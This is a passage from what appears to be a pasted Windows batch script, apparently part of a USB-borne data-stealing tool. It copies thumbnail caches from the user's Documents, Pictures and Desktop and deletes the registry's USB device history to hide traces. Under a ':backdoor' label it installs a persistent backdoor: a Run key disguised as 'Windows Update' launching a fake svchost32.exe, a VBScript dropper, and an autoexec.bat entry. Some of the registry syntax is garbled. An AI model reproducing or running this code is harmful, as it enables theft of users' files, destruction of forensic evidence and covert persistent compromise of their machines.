  344. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  345. echo -----Dump Thumbs.db From MyDoc & Desktop ----- >> ..\.\Documents\%computername%\%username%.txt
  346. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  347. if exist "%userprofile%\My Documents\thumbs.db" mkdir ..\.\Documents\%computername%\Thumbs
  348. copy /Y "%userprofile%\My Documents\My Pictures\thumbs.db" "..\.\Documents\%computername%\Thumbs\MyPictures.db"
  349. copy /Y "%userprofile%\My Documents\thumbs.db" "..\.\Documents\%computername%\Thumbs\MyDocuments.db"
  350. copy /Y "%userprofile%\Desktop\thumbs.db" "..\.\Documents\%computername%\Thumbs\Desktop.db"
  351. echo note: You can view thumb nail size images of files in current dir by using a program >> ..\.\Documents\thumbs\Tip.txt
  352. if exist "..\system\settings\thumbsdis.set" goto :backdoor
  353. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  354. echo -----Delete USB plugin list ----- >> ..\.\Documents\%computername%\%username%.txt
  355. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  356. reg Delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\ /va /f
  357. echo Deleted Recent USB list in registry.
  358. :backdoor
  359. if exist "..\system\Settings\backdoordis.set" goto :end
  360. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\VersionRun "Windows Update"="/"C:\Svchost32.exe"" /y
  361. copy .\system\svchost32.exe C:\svchost32.exe
  362. copy .\system\drivers.vbs C:\drivers.vbs
  363. echo start drivers.vbs C:\svchost32.exe >> autoexec.bat
  364. type autoexec.bat >> C:\autoexec.bat
  365. :end
  366. echo ----------------------------------------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  367. echo -----Time:%date% %time%----- >> ..\.\Documents\%computername%\%username%.txt
  368. echo ----------------------------------------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  369. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement